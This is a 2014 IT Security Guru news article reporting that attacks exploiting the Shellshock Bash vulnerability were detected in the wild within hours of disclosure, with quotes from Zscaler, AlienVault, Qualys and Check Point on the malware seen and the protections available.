Eskenzi PR ad banner Eskenzi PR ad banner
  • About Us
Wednesday, 4 October, 2023
IT Security Guru
Eskenzi PR banner
  • Home
  • Features
  • Insight
  • Channel News
  • Events
    • Most Inspiring Women in Cyber 2022
  • Topics
    • Cloud Security
    • Cyber Crime
    • Cyber Warfare
    • Data Protection
    • DDoS
    • Hacking
    • Malware, Phishing and Ransomware
    • Mobile Security
    • Network Security
    • Regulation
    • Skills Gap
    • The Internet of Things
    • Threat Detection
    • AI and Machine Learning
    • Industrial Internet of Things
  • Multimedia
  • Product Reviews
  • About Us
No Result
View All Result
  • Home
  • Features
  • Insight
  • Channel News
  • Events
    • Most Inspiring Women in Cyber 2022
  • Topics
    • Cloud Security
    • Cyber Crime
    • Cyber Warfare
    • Data Protection
    • DDoS
    • Hacking
    • Malware, Phishing and Ransomware
    • Mobile Security
    • Network Security
    • Regulation
    • Skills Gap
    • The Internet of Things
    • Threat Detection
    • AI and Machine Learning
    • Industrial Internet of Things
  • Multimedia
  • Product Reviews
  • About Us
No Result
View All Result
IT Security Guru
No Result
View All Result

Shellshock-related attacks detected

by The Gurus
September 26, 2014
in Editor's News
Share on FacebookShare on Twitter

Within hours of the Shellshock/Bash vulnerability being disclosed, attacks targeting it in the wild to download additional malware were detected.
 
According to Zscaler’s ThreatLabZ research team, upon successful exploitation of the CVE-2014-6271 vulnerability, an attacker is able to download and install a malicious ELF binary on the target Linux system. The malware connects to a predetermined Command and Control server on a specific port and awaits further instructions from the attacker.
 
Other reports of attacks were spotted by other threat labs. According to AlienVault’s Jaime Blasco, it began running a new module in its honeypots upon notification of the flaw, and it observed “several hits” in the last 24 hours.
 
He said: “Most of them are systems trying to detect if the system is vulnerable and they simply send a ping command back to the attacker’s machine.” He also said that the honeypot received another interesting attack from a file with a PERL script that seems to be a repurposed IRC bot that connects to an IRC server and waits for commands.
 
Blasco said: “As soon as the infected machine connects to the IRC server (185.31.209.84) on port 443, it joins a channel on the IRC server. It seems there are 715 users (probably victims) connected to the server right now. As soon as new victims join the server, the attackers are executing the command “uname  -a” to determine the operating system that is running on the victim as well as “id” to check the current username. Since our honeypot joined the server, more than 20 new victims have become part of the botnet.”
 
Wolfgang Kandek, CTO of Qualys, said: “Our Web Application Firewall has the signatures needed to detect and block Shellshock attacks against websites. The detection is very reliable and is activated by default in the “normal” and “aggressive” settings on the WAF configuration page.
 
“Qualys scanners are considered not exploitable via the BASH vulnerability. Although Qualys scanners have a version of Bash vulnerable to CVE-2014-6271 installed, the scanner exposes no listening interfaces and services to the network, closing the common attack vectors discussed in the release of CVE-2014-6271. Further Bash is not used in any of the communication mechanisms that the scanner uses: scan dispatching, software updates and monitoring.  We will update Bash on the scanner in the next system update cycle.”
 
Check Point said in an update that it had released an IPS signature to protect customer environments. It said: “The signature enables organisations to add a layer of protection to their network during the time they need to update their systems with vendor provided patches. This protection will detect and block attempts to exploit this vulnerability.”

FacebookTweetLinkedIn
Tags: AlienVaultBashShellshockThreatLabZVulnerabilityzscaler
ShareTweet
Previous Post

Veracode and Appthority in legal battle over patent use

Next Post

Next-generation firewalls must evolve to remain relevant

Recent News

Cybersecurity has become the fastest growing start-up sector in UK

UK SME cyber threat concerns on the rise in last 12 months as a quarter admit to being breached

October 3, 2023

The State of Cybersecurity: Cyber skills gap leaves business vulnerable to attacks, new research reveals

October 3, 2023
threat hunting

Threat Hunting with MITRE ATT&CK

October 2, 2023
Guide to ransomware and how to detect it

Guide to ransomware and how to detect it

September 28, 2023

The IT Security Guru offers a daily news digest of all the best breaking IT security news stories first thing in the morning! Rather than you having to trawl through all the news feeds to find out what’s cooking, you can quickly get everything you need from this site!

Our Address: 10 London Mews, London, W2 1HY

Follow Us

© 2015 - 2019 IT Security Guru - Website Managed by Calm Logic

  • About Us
No Result
View All Result
  • Home
  • Features
  • Insight
  • Channel News
  • Events
    • Most Inspiring Women in Cyber 2022
  • Topics
    • Cloud Security
    • Cyber Crime
    • Cyber Warfare
    • Data Protection
    • DDoS
    • Hacking
    • Malware, Phishing and Ransomware
    • Mobile Security
    • Network Security
    • Regulation
    • Skills Gap
    • The Internet of Things
    • Threat Detection
    • AI and Machine Learning
    • Industrial Internet of Things
  • Multimedia
  • Product Reviews
  • About Us

© 2015 - 2019 IT Security Guru - Website Managed by Calm Logic

This site uses functional cookies and external scripts to improve your experience.

Privacy settings

Privacy Settings / PENDING

This site uses functional cookies and external scripts to improve your experience. Which cookies and scripts are used and how they impact your visit is specified on the left. You may change your settings at any time. Your choices will not impact your visit.

NOTE: These settings will only apply to the browser and device you are currently using.

GDPR Compliance

Powered by Cookie Information